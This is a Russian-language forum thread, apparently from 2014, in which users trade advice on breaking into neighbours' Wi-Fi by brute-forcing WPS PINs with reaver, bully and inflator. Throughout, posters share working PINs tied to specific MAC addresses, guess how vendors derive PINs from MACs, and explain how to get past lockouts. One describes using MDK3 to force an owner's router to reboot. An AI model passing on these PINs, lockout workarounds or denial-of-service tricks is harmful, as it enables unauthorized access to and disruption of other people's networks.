Точка пропала сразу после подключения через QSS, прям тут же, причем написано было что подключение прошло успешно и подключен к сети network XXXXXXXX.... После перезагрузки компа нету данной сети, нет также её под другим SSID так как мониторю из под обычного бука, а на ней сигнал был полный, а взлом веду со стационарника + alfa.
Сегодня ещё одну тему заметил:
Я тут на форуме рассказывал что есть TP-Link с 64:66:B3:......
Так вот, почти заканчивается третий месяц и только заметил..... обидно, но делюсь опытом.
Уже перебрал 3190 пинов и точка после 18 пинов уходит в лок, а я её MDK3 ну и жду пока хозяин перезагрузит.....
Короче, если её не трогать после перебора 2 часа, то потом можна ещё 18 пинов перебрать, сейчас буду время сокращать до 1,5 часа.
Потом отпишусь....
Vikhedgehog
20.02.2014, 02:38
Вот еще один пин код от точки D-Link если кто-то пытается найти алгоритм:
50422494
MAC: 78:54:2E:F4:C0:FE
Кстати тут раньше кто-то выложил большой список wps кодов, так вот, там было:
F0:7D:68:40:C3:7A
и к нему PIN = 02445908
это все от D-Link
когда попробовал перевести последние 3 значения в DEC получилось 4244346, то есть получилось что настоящий пин (первые 4 числа) на 4.000 меньше сгенерированного. С другими похожими точками немного не так, но я к тому что скорее всего почти все производители генерируют WPS PIN из мак адреса, просто потом все кроме ZyXEL добавляют шум в виде умножения или сложения с каким-нибудь другим числом. Может есть тут кто-то у кого очень хорошо с математикой и кто видит тут точную закономерность?
Вот ссыль на пост с базой для F0:7D:68
http://forum.antichat.ru/showpost.php?p=3659929&postcount=1572
Вот еще один пин код от точки D-Link если кто-то пытается найти алгоритм:
50422494
MAC: 78:54:2E:F4:C0:FE
Кстати тут раньше кто-то выложил большой список wps кодов, так вот, там было:
F0:7D:68:40:C3:7A
и к нему PIN = 02445908
когда попробовал перевести последние 3 значения в DEC получилось 4244346, то есть получилось что настоящий пин (первые 4 числа) на 4.000 меньше сгенерированного. С другими похожими точками немного не так, но я к тому что скорее всего почти все производители генерируют WPS PIN из мак адреса, просто потом все кроме ZyXEL добавляют шум в виде умножения или сложения с каким-нибудь другим числом.
Круто! Значит,таки закономерность есть. И,если я правильно поняла, это можно как-то использовать для ограничения диапазона перебора..то есть, не все 11000, а меньше, и прогонять можно не с ноля. А как с другими, Вы сказали "немного не так", но тоже есть закономерность?
Vikhedgehog
20.02.2014, 03:06
Круто! Значит,таки закономерность есть. И,если я правильно поняла, это можно как-то использовать для ограничения диапазона перебора..то есть, не все 11000, а меньше, и прогонять можно не с ноля. А как с другими, Вы сказали "немного не так", но тоже есть закономерность?
Ну пока еще слишком мало информации про закономерность, там были пин коды и больше и меньше числа вычисленного при помощи перевода из hex в dec.
А так вот что там еще было:
3E:50:0F
PIN: 28504610
Вычисленный: 4083727
А разность: 1233266
Как то странно что начинается с 123, причем это повторилось и с другой точкой у которой вторая часть мака начиналась с 3F. В общем че-то тут есть.
Ну пока еще слишком мало информации про закономерность, там были пин коды и больше и меньше числа вычисленного при помощи перевода из hex в dec.
А так вот что там еще было:
3E:50:0F
PIN: 28504610
Вычисленный: 4083727
А разность: 1233266
Как то странно что начинается с 123, причем это повторилось и с другой точкой у которой вторая часть мака начиналась с 3F. В общем че-то тут есть.
Спасибо 4pips, пароль к точке 10:FE:ED.... 65625453,он же пин!
VasiliyP
23.02.2014, 00:58
Народ, в диапазоне 5 ГГц есть жизнь какая-нибудь? Если, к примеру, на 2.4 ГГц видно 100 точек, то сколько их будет на 5 ГГц?
Народ, в диапазоне 5 ГГц есть жизнь какая-нибудь? Если, к примеру, на 2.4 ГГц видно 100 точек, то сколько их будет на 5 ГГц?
Ну восновном если 5Гц вкл, то и 2,4Гц включено.
А так как оборудования на 5Гц меньше люди используют чем 2,4Гц, то соответственно и точек с 5Гц меньше включено
(это мои личные догадки)
Vikhedgehog
23.02.2014, 03:01
Народ, в диапазоне 5 ГГц есть жизнь какая-нибудь? Если, к примеру, на 2.4 ГГц видно 100 точек, то сколько их будет на 5 ГГц?
У 5GhZ плохой радиус действия. Айпад показывает где-то 50 сеток, и только одна сеть на балконе похоже 5GhZ тк компьютер с внешней антенной ее не видит. 802.11a редкость да и к тому же устаревшая, так что стоит ожидать разве что роутеры со смешанным режимом, то есть можно подключиться к точке и на 2.4G и на 5G.
binarymaster
24.02.2014, 10:39
а для андроида есть какиенить проги чтоб подключатся к сети зная тока wps ? ато поставил класную прогу wpspin, она обалденно генерирует пины для зюкселей, а вот подрубатся то нечем ну не таскать же с собой ноутбук.
+ Аналогичный вопрос. Не нашёл встроенных средств входа по PIN-коду в андройде.
VasiliyP
24.02.2014, 11:01
+ Аналогичный вопрос. Не нашёл встроенных средств входа по PIN-коду в андройде.
http://savepic.net/4703076m.pnghttp://savepic.net/4708196m.png
binarymaster
24.02.2014, 11:22
http://savepic.net/4703076m.pnghttp://savepic.net/4708196m.png
Галка "Показать расширенные функции" переименована в "Дополнительно", а пункт меню WPS отсутствует.
Android 4.4.2 (Nexus 4)
Сдаётся мне, это проблема данной модели...
madhatter
24.02.2014, 12:00
Галка "Показать расширенные функции" переименована в "Дополнительно", а пункт меню WPS отсутствует.
Android 4.4.2 (Nexus 4)
Сдаётся мне, это проблема данной модели...
Если я внятно помню спецификацию этой говнонадстройки, то она теоритечески должна поддерживаться аппаратно. Формально. Wireless-железки в мобильных устройствах - это мрак, одна кошмарнее другой. Еще большая беда в том, что их на самом деле не так много, и многие лепят их на все подряд, т.к. они могут быть в виде 10in1: bt+wi-fi+gps+...
Попробуйте другие прошивочки и патчи.
Всем привет. Дважды ломал точку 10:FE:ED с помощью reaver и дважы доходило до 99.99% 22419989 без выдачи пароля. Потом дважды пробовал вводить команду -p 2241 и reaver крутил по кругу прмерно 10 пинов одних и тех-же. Когда запустил bully, с первого раза добыл пароль. В чём может быть дело, почему reaver так себя поводит? Спасибо.
а есть ли где нибудь базы пин кодов wps разных производителей роутеров?ну вот например если я точно знаю модель роутера,прошивку,серийный номер.Нет таких баз?
а есть ли где нибудь базы пин кодов wps разных производителей роутеров?ну вот например если я точно знаю модель роутера,прошивку,серийный номер.Нет таких баз?
Есть, в этой базе ещё и пароль дефолтный - точно такой же как и пин. Но пароль могут сменить как и пин.
Есть, в этой базе ещё и пароль дефолтный - точно такой же как и пин. Но пароль могут сменить как и пин.
именно по моделям роутеров база?
именно по моделям роутеров база?
СЕРЖ ты такой большой а в сказки веришь...
СЕРЖ ты такой большой а в сказки веришь...
ну чего сказки то
ну чего сказки то
А ты хендшейки поймал от этих точек?
А ты хендшейки поймал от этих точек?
та что их там ловить....это же секунда делов ,конечно ловил Я просто не любитель убивать видяху,проц, брутами,если ты намекаешь на то,что бы прогонять в даже самых лучших,скоростных прогах по подбору....нехочу
А чего ей будет, видяхе-то? Если с температурой особо не шалить 100 лет проработает
Всем привет. Дважды ломал точку 10:FE:ED с помощью reaver и дважы доходило до 99.99% 22419989 без выдачи пароля. Потом дважды пробовал вводить команду -p 2241 и reaver крутил по кругу прмерно 10 пинов одних и тех-же. Когда запустил bully, с первого раза добыл пароль. В чём может быть дело, почему reaver так себя поводит? Спасибо.
И что точка не лочится? Это TP-LINK на новой прошивке и даётся 10 попыток а потом точка уходит в лок.Есть у меня рядом такая точка вот никак не могу взломать и хейш не могут подобрать на форуме. Может у кого есть ещё возможные пин для этого мас?
И что точка не лочится? Это TP-LINK на новой прошивке и даётся 10 попыток а потом точка уходит в лок.Есть у меня рядом такая точка вот никак не могу взломать и хейш не могут подобрать на форуме. Может у кого есть ещё возможные пин для этого мас?
а ты думаешь,что для такого мака одинаковые пины будут? они абсолютно разные могут быть,а самое главное......их менять можно,на произвольные т.е хозяин точки какие угодно цифры может поставить.....так что всё это гиблое дело,по wps,только хендшейк,а там лотерея поставить чел пароль на 64 символа и будешь всю свою жизнь подбирать и не подберёшь
а ты думаешь,что для такого мака одинаковые пины будут? они абсолютно разные могут быть,а самое главное......их менять можно,на произвольные т.е хозяин точки какие угодно цифры может поставить.....так что всё это гиблое дело,по wps,только хендшейк,а там лотерея поставить чел пароль на 64 символа и будешь всю свою жизнь подбирать и не подберёшь
Большинство не такие продвинутые и даже понятие не имеют что такое wps и где pin менять.А pin спрашиваю вдруг прокатит.
Большинство не такие продвинутые и даже понятие не имеют что такое wps и где pin менять.А pin спрашиваю вдруг прокатит.
ну пин бы может и прокатил,но не бывает же один и тот же пин на всех устройствах Это же фантастика какая то хоть на одну цифру или букву,но точно будет другой Так бы все,имея пин от похожего мака подключались бы к точкам
ну пин бы может и прокатил,но не бывает же один и тот же пин на всех устройствах Это же фантастика какая то хоть на одну цифру или букву,но точно будет другой Так бы все,имея пин от похожего мака подключались бы к точкам
Имею 9 точек подобранных по одному пину 76229909 роутер DSL_2640NRU . 46264848 так же от части этих роутеров.
Имею 9 точек подобранных по одному пину 76229909 роутер DSL_2640NRU . 46264848 так же от части этих роутеров.
Привет земляк, вот тут ссылка на хабр я уже писал, что пин от DSL_2640NRU зависит от версии прошивки.
Black_Scorpi
03.03.2014, 03:33
Помогите.что прописывать в inflator при локе сети.
Лочит на 60с. Вот такая картина: Фото
saimonyz
03.03.2014, 05:35
Помогите.что прописывать в inflator при локе сети.
Лочит на 60с. Вот такая картина: Фото
-L ну наврятли ломаешь
-L ну наврятли ломаешь
та -L ничего не даёт....всё....это wps залочен,хоть какую команду прописывай,перебираться не будет....
Black_Scorpi
03.03.2014, 14:00
та -L ничего не даёт....всё....это wps залочен,хоть какую команду прописывай,перебираться не будет....
Я в этом не очень понимаю.А можно как то прописать время и количество паролей ,чтоб например подобрать 2 пароля и остановиться на минуту. Выйдет долго,но должно наверно получится?! Я каждое утро пробую,программа подбирает паролей 3-5 и сеть лочится...
Я в этом не очень понимаю.А можно как то прописать время и количество паролей ,чтоб например подобрать 2 пароля и остановиться на минуту. Выйдет долго,но должно наверно получится?! Я каждое утро пробую,программа подбирает паролей 3-5 и сеть лочится...
а при чём тут время в прошивке роутера просто стоит ограничение например на 10 вводов пина.....ввёл(перебрал) 10 неправильных пинов,и всё.....и досвидос точка залочилась,у кого как,у кого мин на 5,у кого на пару часов,у кого то на недельку,у кого то навсегда или перезагрузка роутера или незнаю....
короче гемморой возиться с этими точками,которые лочаться....годами подбирать будешь
можно прописать время и остановиться на минуту. Выйдет долго,но должно наверно получится?! Я каждое утро пробую,программа подбирает паролей 3-5 и сеть лочится...
Поставь птичку где обвел на картинке, и в прямоугольнике укажи желаемое время. Но это всё экспериментальным путем. Как пишет серж32 все точки ведут себя по разному. У меня есть точка работает до перезагрузки. Когда хозяин включил, я 5 пинов пробил и жду когда он выключится и сново включится. А есть точка через 10 пинов лочится на 5 минут. Вот в этом случае помогает.
Black_Scorpi
05.03.2014, 01:12
Поставь птичку где обвел на картинке, и в прямоугольнике укажи желаемое время. Но это всё экспериментальным путем. Как пишет серж32 все точки ведут себя по разному. У меня есть точка работает до перезагрузки. Когда хозяин включил, я 5 пинов пробил и жду когда он выключится и сново включится. А есть точка через 10 пинов лочится на 5 минут. Вот в этом случае помогает.
Попробовал я как ты посоветовал,толку 0. Теперь перебор вообще не идет.Первые несколько паролей подбирает и встает. По ходу она лочится на долго)
Забил на нее.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot